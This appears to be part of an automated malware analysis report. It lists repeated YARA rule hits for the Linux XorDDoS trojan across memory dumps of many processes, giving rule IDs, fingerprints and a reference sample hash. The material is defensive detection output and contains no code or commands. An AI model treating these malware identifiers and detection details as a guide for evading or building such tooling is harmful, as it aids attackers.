Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
